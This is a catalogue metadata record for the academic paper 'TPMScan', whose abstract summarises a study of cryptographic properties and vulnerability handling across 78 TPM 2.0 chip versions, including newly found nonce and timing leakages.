TPMScan: A wide-scale study of security-relevant properties of TPM 2.0 chips
The Trusted Platform Module (TPM) is a widely deployed computer component that provides increased protection of key material during cryptographic operations, secure storage, and support for a secure boot with a remotely attestable state of the target machine. A systematic study of the TPM ecosystem...
| Main Authors: | , , , , , , |
|---|---|
| Format: | Article |
| Language: | English |
| Published: |
Ruhr-Universität Bochum
2024-03-01
|
| Series: | Transactions on Cryptographic Hardware and Embedded Systems |
| Subjects: | |
| Online Access: | https://tches.iacr.org/index.php/TCHES/article/view/11444 |
| _version_ | 1827318184420573184 |
|---|---|
| author | Petr Svenda Antonin Dufka Milan Broz Roman Lacko Tomas Jaros Daniel Zatovic Josef Pospisil |
| author_facet | Petr Svenda Antonin Dufka Milan Broz Roman Lacko Tomas Jaros Daniel Zatovic Josef Pospisil |
| author_sort | Petr Svenda |
| collection | DOAJ |
| description |
The Trusted Platform Module (TPM) is a widely deployed computer component that provides increased protection of key material during cryptographic operations, secure storage, and support for a secure boot with a remotely attestable state of the target machine. A systematic study of the TPM ecosystem, its cryptographic properties, and the orderliness of vulnerability mitigation is missing despite its pervasive deployment – likely due to the black-box nature of the implementations. We collected metadata, RSA and ECC cryptographic keys, and performance characteristics from 78 different TPM versions manufactured by 6 vendors, including recent Pluton-based iTPMs, to systematically analyze TPM implementations.
Surprisingly, a high rate of changes with a detectable impact on generated secrets, the timing of cryptographic operations, and frequent off-chip generation of Endorsement Keys were observed. Our analysis of public artifacts for TPM-related products certified under Common Criteria (CC) and FIPS 140 showed relatively high popularity of TPMs but without explanation for these changes in cryptographic implementations. Despite TPMs being commonly certified to CC EAL4+, serious vulnerabilities like ROCA or TPM-Fail were discovered in the past. We found a range of additional unreported nonce leakages in ECDSA, ECSCHNORR, and ECDAA algorithms in dTPMs and fTPMs of three vendors. The most serious discovered leakage allows extraction of the private key of certain Intel’s fTPM versions using only nine signatures with no need for any side-channel information, making the vulnerability retrospectively exploitable despite a subsequent firmware update. Unreported timing leakages were discovered in the implementations of ECC algorithms on multiple Nuvoton TPMs, and other previously reported leakages were confirmed. The analysis also unveiled incompleteness of vulnerability reporting and subsequent mitigation with missing clear information about the affected versions and inconsistent fixes.
|
| first_indexed | 2024-04-24T23:53:38Z |
| format | Article |
| id | doaj.art-07ce4cb0415c411d843401c0929d68d2 |
| institution | Directory Open Access Journal |
| issn | 2569-2925 |
| language | English |
| last_indexed | 2024-04-24T23:53:38Z |
| publishDate | 2024-03-01 |
| publisher | Ruhr-Universität Bochum |
| record_format | Article |
| series | Transactions on Cryptographic Hardware and Embedded Systems |
| spelling | doaj.art-07ce4cb0415c411d843401c0929d68d22024-03-14T16:24:44ZengRuhr-Universität BochumTransactions on Cryptographic Hardware and Embedded Systems2569-29252024-03-012024210.46586/tches.v2024.i2.714-734TPMScan: A wide-scale study of security-relevant properties of TPM 2.0 chipsPetr Svenda0Antonin Dufka1Milan Broz2Roman Lacko3Tomas Jaros4Daniel Zatovic5Josef Pospisil6Masaryk University, Brno, Czech RepublicMasaryk University, Brno, Czech RepublicMasaryk University, Brno, Czech RepublicMasaryk University, Brno, Czech RepublicMasaryk University, Brno, Czech RepublicRed Hat, Brno-Medlánky, Czech RepublicNational Cyber and Information Security Agency, Brno, Czech Republic The Trusted Platform Module (TPM) is a widely deployed computer component that provides increased protection of key material during cryptographic operations, secure storage, and support for a secure boot with a remotely attestable state of the target machine. A systematic study of the TPM ecosystem, its cryptographic properties, and the orderliness of vulnerability mitigation is missing despite its pervasive deployment – likely due to the black-box nature of the implementations. We collected metadata, RSA and ECC cryptographic keys, and performance characteristics from 78 different TPM versions manufactured by 6 vendors, including recent Pluton-based iTPMs, to systematically analyze TPM implementations. Surprisingly, a high rate of changes with a detectable impact on generated secrets, the timing of cryptographic operations, and frequent off-chip generation of Endorsement Keys were observed. Our analysis of public artifacts for TPM-related products certified under Common Criteria (CC) and FIPS 140 showed relatively high popularity of TPMs but without explanation for these changes in cryptographic implementations. Despite TPMs being commonly certified to CC EAL4+, serious vulnerabilities like ROCA or TPM-Fail were discovered in the past. We found a range of additional unreported nonce leakages in ECDSA, ECSCHNORR, and ECDAA algorithms in dTPMs and fTPMs of three vendors. The most serious discovered leakage allows extraction of the private key of certain Intel’s fTPM versions using only nine signatures with no need for any side-channel information, making the vulnerability retrospectively exploitable despite a subsequent firmware update. Unreported timing leakages were discovered in the implementations of ECC algorithms on multiple Nuvoton TPMs, and other previously reported leakages were confirmed. The analysis also unveiled incompleteness of vulnerability reporting and subsequent mitigation with missing clear information about the affected versions and inconsistent fixes. https://tches.iacr.org/index.php/TCHES/article/view/11444TPMRSAECDSAECSCHNORRECDAAECC key recovery |
| spellingShingle | Petr Svenda Antonin Dufka Milan Broz Roman Lacko Tomas Jaros Daniel Zatovic Josef Pospisil TPMScan: A wide-scale study of security-relevant properties of TPM 2.0 chips Transactions on Cryptographic Hardware and Embedded Systems TPM RSA ECDSA ECSCHNORR ECDAA ECC key recovery |
| title | TPMScan: A wide-scale study of security-relevant properties of TPM 2.0 chips |
| title_full | TPMScan: A wide-scale study of security-relevant properties of TPM 2.0 chips |
| title_fullStr | TPMScan: A wide-scale study of security-relevant properties of TPM 2.0 chips |
| title_full_unstemmed | TPMScan: A wide-scale study of security-relevant properties of TPM 2.0 chips |
| title_short | TPMScan: A wide-scale study of security-relevant properties of TPM 2.0 chips |
| title_sort | tpmscan a wide scale study of security relevant properties of tpm 2 0 chips |
| topic | TPM RSA ECDSA ECSCHNORR ECDAA ECC key recovery |
| url | https://tches.iacr.org/index.php/TCHES/article/view/11444 |
| work_keys_str_mv | AT petrsvenda tpmscanawidescalestudyofsecurityrelevantpropertiesoftpm20chips AT antonindufka tpmscanawidescalestudyofsecurityrelevantpropertiesoftpm20chips AT milanbroz tpmscanawidescalestudyofsecurityrelevantpropertiesoftpm20chips AT romanlacko tpmscanawidescalestudyofsecurityrelevantpropertiesoftpm20chips AT tomasjaros tpmscanawidescalestudyofsecurityrelevantpropertiesoftpm20chips AT danielzatovic tpmscanawidescalestudyofsecurityrelevantpropertiesoftpm20chips AT josefpospisil tpmscanawidescalestudyofsecurityrelevantpropertiesoftpm20chips |